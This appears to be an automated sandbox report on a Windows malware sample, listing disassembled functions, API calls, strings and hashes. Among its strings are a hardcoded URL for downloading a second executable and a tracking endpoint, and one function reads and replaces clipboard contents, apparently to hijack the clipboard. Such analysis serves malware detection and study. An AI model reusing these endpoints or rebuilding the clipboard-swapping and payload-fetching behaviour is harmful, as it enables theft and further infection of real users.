                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseHandleOpen_wcslen
                                                            • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                            • API String ID: 3067768807-1501832161
                                                            • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                            • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                            • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                            • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                            • String ID: %X@
                                                            • API String ID: 1687354797-3313093589
                                                            • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                            • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69

                                                            Control-flow Graph

                                                            APIs
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID: 11@$f(@
                                                            • API String ID: 1611280651-1277599000
                                                            • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                            • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                            • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                            • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68

                                                            Control-flow Graph

                                                            APIs
                                                            • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                            • __Cnd_signal.LIBCPMT ref: 0040584D
                                                            • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                            • String ID:
                                                            • API String ID: 2059591211-0
                                                            • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                            • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D

                                                            Control-flow Graph

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004029AF
                                                            • __fassign.LIBCMT ref: 004029BF
                                                              • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                            • String ID: 4+@
                                                            • API String ID: 2843524283-3700369575
                                                            • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                            • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                            • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                            • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                            • __dosmaperr.LIBCMT ref: 0042E190
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2744730728-0
                                                            • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                            • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                            • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                            • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8

                                                            Control-flow Graph

                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                            • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                            • __dosmaperr.LIBCMT ref: 004347BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2336955059-0
                                                            • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                            • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                            • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                            • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794

                                                            Control-flow Graph

                                                            APIs
                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID:
                                                            • API String ID: 1818849710-0
                                                            • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                            • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                            • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                            • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                              • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                              • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                            • ExitThread.KERNEL32 ref: 0042E0A6
                                                            • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                            • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                            • String ID:
                                                            • API String ID: 1198197534-0
                                                            • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                            • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                            • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                            • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID: 'C
                                                            • API String ID: 269201875-3508614867
                                                            • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                            • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                            • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                            • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                            • PostQuitMessage.USER32(00000000), ref: 00402583
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: MessagePostProcQuitWindow
                                                            • String ID:
                                                            • API String ID: 3873111417-0
                                                            • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                            • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                            APIs
                                                            • Sleep.KERNEL32(0000215D), ref: 00401562
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Sleep
                                                            • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                            • API String ID: 3358372957-2681926500
                                                            • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                            • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                            • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                            • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000400,?,?,00A50223,?,?), ref: 00A50E19
                                                            • SetErrorMode.KERNEL32(00000000,?,?,00A50223,?,?), ref: 00A50E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 6997d95fe0bba384da2db6e9190e1a8979efa8172c50f28b72e00f6c9120b453
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 10D0123114512877D7002B94DC09BCD7B1CDF05B63F108411FF0DD9080C770994046E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                            • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                            • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                            • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                            • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                            • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                            • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID:
                                                            • API String ID: 323602529-0
                                                            • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                            • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                            • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                            • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_catch
                                                            • String ID:
                                                            • API String ID: 3886170330-0
                                                            • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                            • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                            • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                            • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                            • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                            • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                            • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                            • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                            • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                            • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID:
                                                            • API String ID: 2005118841-0
                                                            • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                            • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                            • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                            • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                            • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                            • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                            • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00869BE6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: 7c198ffd8842638df1cadaf7d6155a0d7570fa7ea1249e0ea45223162e9ba35d
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 66113F79A00208EFDB01DF98C985E98BBF5EF08350F058094F9489B362D371EA50DF80
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A51951
                                                            • Sleep.KERNEL32(000011EB), ref: 00A5195B
                                                              • Part of subcall function 00A5CE9C: _strlen.LIBCMT ref: 00A5CEB3
                                                            • OpenClipboard.USER32(00000000), ref: 00A51988
                                                            • GetClipboardData.USER32(00000001), ref: 00A51998
                                                            • _strlen.LIBCMT ref: 00A519B4
                                                            • _strlen.LIBCMT ref: 00A519E3
                                                            • _strlen.LIBCMT ref: 00A51B27
                                                            • EmptyClipboard.USER32 ref: 00A51B3D
                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A51B4A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00A51B74
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00A51B7D
                                                            • GlobalFree.KERNEL32(00000000), ref: 00A51B84
                                                            • CloseClipboard.USER32 ref: 00A51BA8
                                                            • Sleep.KERNEL32(000002C7), ref: 00A51BB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                            • String ID: 4#E$i
                                                            • API String ID: 4246938166-2480119546
                                                            • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                            • Instruction ID: f749e1a6551f7aad98ec63b3501f20ead27a615e94fd376bf85d0085fd54cf4f
                                                            • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                            • Instruction Fuzzy Hash: E351E331C00384AAD711DBA4EE46BBD7774FF2A303F045228ED05A6163EBB09A89C759
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 00A523B8
                                                            • GetClientRect.USER32(?,?), ref: 00A523CD
                                                            • GetDC.USER32(?), ref: 00A523D4
                                                            • CreateSolidBrush.GDI32(00646464), ref: 00A523E7
                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00A52406
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A52427
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A52432
                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 00A5243B
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00A5245F
                                                            • SetBkMode.GDI32(?,00000001), ref: 00A524EA
                                                            • _wcslen.LIBCMT ref: 00A52502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 1529870607-0
                                                            • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                            • Instruction ID: b62186c11bde3101c421e4c7123f29c9b30ba2cdea1961946380d754e671354f
                                                            • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                            • Instruction Fuzzy Hash: ED71ED72900218AFDB229F64DD85FAEB7BCEB49711F0041A5F609E6155DA70AF84CF14
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                            • Instruction ID: 704f0dc4c1cc7227d133c65a0813f8dc888d98eeea65dda385bca534dc2e7eac
                                                            • Opcode Fuzzy Hash: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                            • Instruction Fuzzy Hash: 37C26D71E096288FDB25DE29DD407EAB7B5EB48304F1451EBD80DE7280E778AE818F45
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                            • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A8BD14,?,00000000), ref: 00A8BA8E
